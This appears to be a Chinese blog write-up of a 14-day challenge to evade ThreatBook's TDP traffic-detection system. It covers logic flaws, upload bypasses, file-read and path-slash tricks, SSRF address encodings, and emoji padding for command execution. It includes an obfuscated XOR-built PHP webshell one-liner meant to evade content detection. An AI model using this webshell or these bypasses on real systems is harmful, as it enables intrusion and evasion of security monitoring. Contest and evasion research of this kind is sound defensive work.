0x01 前言
为期14天的TDP线上挑战赛已经结束全部赛程,这两个星期的排行榜也变化很大。本来没有多少时间的我就只在第一个星期花了点时间,大概总共花了三个小时吧。这期间感谢@PeiQi 一直和师傅交流,也不断地提供思路给我。恭喜PeiQi师傅这次荣获第一。我在最后的一两个小时被反超,从最高的第四名到最后的第十一名,这次也是个经验与成长,所以简单的记录一下。
0x02 WriteUp
1. 逻辑漏洞
对于逻辑漏洞,TDP作为流量检测是没办法识别的。
比如:任意用户登录、用户重复注册等
不过分数相对会低很多,毕竟是Nday的利用与复现。如果是0Day,质量比较好的会有一百分以上,有加分。
2. 文件上传
测试了TDP之后发现,它的一个感知会先检测文件名之后再检测文件内容
比如我们使用.php结尾会立刻被检测,我们可以使用:pHtml来绕过
对于内容,可以通过该代码绕过检测。在这里感谢PeiQi师傅提供思路
<? @("Y;HJ(Z"^"8H;/Z.")(${"~?}$"^"!x8p"}[1]);
3. 任意文件读取/任意文件下载
我们打任意文件读取的时候,对于Linux经常会习惯性的etc/passwd这个对于TDP是能够检测的,比较敏感的目录他都会拦截
但是对于文件比较小的conf文件它是不会检测的
4. 信息泄露
信息泄露的话,TDP对于某些目录会拦截,比如:/windows/php.ini
如果说是某个文件泄露的数据,比如管理员密码等。可以通过加一个斜杆来绕过。在推特上很多师傅发的技巧中,有很多也是通过斜杆来绕过的。
例子:
/xxx/xxx/password.conf #拦截
/xxx/xxx/password.conf/ #不拦截
5. SSRF
正常大家的绕过思路
http://127.0.0.1 >>> http://0177.0.0.1/
http://127.0.0.1 >>> http://2130706433/
http://192.168.0.1 >>> http://3232235521/
http://192.168.1.1 >>> http://3232235777/
http://[email protected]
http://www。qq。com
http://wwwqqcom
http://www.qq.com
http://dwz.cn/xxxx #短链接
http://127.0.0.1.xip.io/
等等 ... ...
在这里我们可以使用Emoji?或者Unicode字符集,还有通过各种表情来造成脏数据。
ⓔⓧⓐⓜⓟⓛⓔ.ⓒⓞⓜ
(⊙﹏⊙)
6. 命令执行
下午看到PeiQi师傅已经发过了,这里也是参考的PeiQi师傅的思路
last命令是不拦截的
https://mp.weixin.qq.com/s/OcNVMNGOuVP7BUidACJSoA
我们可以通过大量的emoji进行脏数据来绕过TDP检测
????✔ ... ...
从现在开始,星球定价150元!日后只有慢慢涨没有跌价!现在入股不亏,持续输出原创文章,还是小有干货的!
原文始发于微信公众号(不懂安全的校长):总结 | 微步TDP挑战赛的一些思路
